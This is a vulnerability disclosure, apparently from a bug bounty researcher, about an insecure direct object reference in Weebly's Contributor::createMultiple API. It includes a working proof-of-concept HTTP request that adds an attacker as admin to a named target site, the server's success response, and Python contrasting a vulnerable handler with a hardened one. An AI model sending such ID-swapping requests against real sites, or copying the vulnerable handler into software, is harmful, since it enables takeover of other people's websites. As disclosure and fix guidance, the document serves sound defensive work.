Hijacking any Weebly Website [Insecure Direct Object Reference Vulnerability]
Title: Hijack any website from weebly.com by just adding an administrator to their website. [Insecure Direct Object Reference Vulnerability]
=====
Weebly is a web-hosting service with a drag-and-drop website builder. As of August 2012, Weebly hosted over 20 million sites and received over 1 million unique visitors a month (http://en.wikipedia.org/wiki/Weebly).
Website: https://www.weebly.com
Any Weebly account holder can hijack any other Weebly site by inviting themselves as an administrator. The Contributor::createMultiple JSON-RPC call takes owner_id and site_id from the request body, and the server accepted the request without verifying that the logged-in user actually owns the site_id supplied; substituting the target site's owner_id and site_id is enough. The resulting invitation is created with role "admin" and allow_publish true, so once the attacker accepts it from their own mailbox they have full control of the target site.
=====
PoC:
Video:
https://www.youtube.com/watch?v=ovM-wliY7lE
Written:
Here are the target site's details:
weebly site: ohhyeahphfudge.weebly.com
owner_id: 47812623
site_id: 367503762921888574
=====
HTTP Request:
POST /api/JsonRPC/Editor/ HTTP/1.1
Host: www.weebly.com

{
  "jsonrpc": "2.0",
  "method": "Contributor::createMultiple",
  "params": [
    {
      "role": "admin",
      "email": "huehuehuehue10+weebly@gmail.com",
      "message": "HiJacking Weebly websites",
      "restrict_pages": false,
      "owner_id": "47812623",
      "site_id": "367503762921888574"
    }
  ],
  "id": 0
}
=====
HTTP Response:
HTTP/1.1 200 OK
Date: Sun, 22 Feb 2015 08:29:26

{
  "jsonrpc": "2.0",
  "id": 0,
  "method": "Contributor::createMultiple",
  "result": {
    "success": true,
    "models": [
      {
        "id": "invitation-596276730608950492",
        "pending": true,
        "owner_id": "47812623",
        "user_id": null,
        "site_id": "367503762921888574",
        "email": "huehuehuehue10+weebly@gmail.com",
        "last_login": false,
        "role": "admin",
        "display_role": "Administrator",
        "invitation_id": "596276730608950492",
        "invitation_used": null,
        "invitation_retracted": null,
        "message": "HiJacking Weebly websites",
        "restrict_pages": false,
        "allowed_pages": [],
        "allow_publish": true,
        "allow_stats": true,
        "allow_form_entries": true,
        "allow_blog_comments": true
      }
    ],
    "errors": []
  }
}
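The exchange above, modelled as a minimal JSON-RPC handler. This is an added example, not Weebly's code: it shows the vulnerable form the writeup describes (owner_id and site_id taken from the request body and trusted) next to a hardened form that derives the owner from the session and checks site ownership server-side. The ownership table, sessions and the attacker's account are constructed for the example; only the target owner_id, site_id and the PoC request body come from the writeup.

```python
import json

# Constructed data for the example. The target owner_id/site_id are the values
# from the writeup; the attacker's account, site and session tokens are
# hypothetical.
SITES = {
    "367503762921888574": "47812623",  # target site, owned by 47812623
    "100000000000000001": "90000001",  # attacker's own site (constructed)
}
SESSIONS = {
    "attacker-session": "90000001",  # attacker, an ordinary logged-in user
    "owner-session": "47812623",     # legitimate owner of the target site
}

# The JSON-RPC body from the PoC request (values from the writeup).
POC_BODY = json.dumps({
    "jsonrpc": "2.0",
    "method": "Contributor::createMultiple",
    "params": [{
        "role": "admin",
        "email": "huehuehuehue10+weebly@gmail.com",
        "message": "HiJacking Weebly websites",
        "restrict_pages": False,
        "owner_id": "47812623",
        "site_id": "367503762921888574",
    }],
    "id": 0,
})


def vulnerable_create_multiple(user_id, params):
    """Vulnerable handler: owner_id and site_id are taken from the request
    body and never compared with the caller. Any authenticated user can
    invite an admin to any site, which is the IDOR in the writeup."""
    p = params[0]
    model = {
        "site_id": p["site_id"],
        "owner_id": p["owner_id"],  # attacker-controlled
        "email": p["email"],
        "role": p["role"],
        "pending": True,
    }
    return {"success": True, "models": [model], "errors": []}


def hardened_create_multiple(user_id, params):
    """Hardened handler: the owner is the authenticated user, and site_id is
    accepted only if the ownership table says that user owns it."""
    p = params[0]
    site_id = p.get("site_id")
    if SITES.get(site_id) != user_id:
        # Same response shape, nothing created, and no hint about whether
        # the site exists (missing and foreign sites are answered alike).
        return {"success": False, "models": [],
                "errors": [{"site_id": site_id, "code": "forbidden"}]}
    model = {
        "site_id": site_id,
        "owner_id": user_id,  # derived server-side; the body value is ignored
        "email": p["email"],
        "role": p["role"],
        "pending": True,
    }
    return {"success": True, "models": [model], "errors": []}


def handle_rpc(session_token, body, create_multiple):
    """Minimal JSON-RPC dispatcher for /api/JsonRPC/Editor/. The
    create_multiple argument selects which handler implementation runs."""
    req = json.loads(body)
    user_id = SESSIONS.get(session_token)
    if user_id is None:
        return {"jsonrpc": "2.0", "id": req.get("id"),
                "error": {"code": -32001, "message": "not authenticated"}}
    if req.get("method") != "Contributor::createMultiple":
        return {"jsonrpc": "2.0", "id": req.get("id"),
                "error": {"code": -32601, "message": "method not found"}}
    result = create_multiple(user_id, req["params"])
    return {"jsonrpc": "2.0", "id": req.get("id"),
            "method": req["method"], "result": result}


if __name__ == "__main__":
    for label, impl in (("vulnerable", vulnerable_create_multiple),
                        ("hardened", hardened_create_multiple)):
        resp = handle_rpc("attacker-session", POC_BODY, impl)
        print(f"{label}: attacker invites admin to target -> "
              f"success={resp['result']['success']}")
```

Against the vulnerable handler the attacker's session gets success=true and an admin invitation bound to the victim's site, exactly as in the PoC response; against the hardened handler the same body is refused, while the real owner's session still succeeds. The point of the fix is that the authorization decision uses only server-side state (the session and the ownership table), never the identifiers the client chose to send.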
=====
Report Timeline:
February 22, 2015 – Bug Found by Allan Jay Dumanhug.
February 26, 2015 – Vendor Response and Vendor Fix/Patch.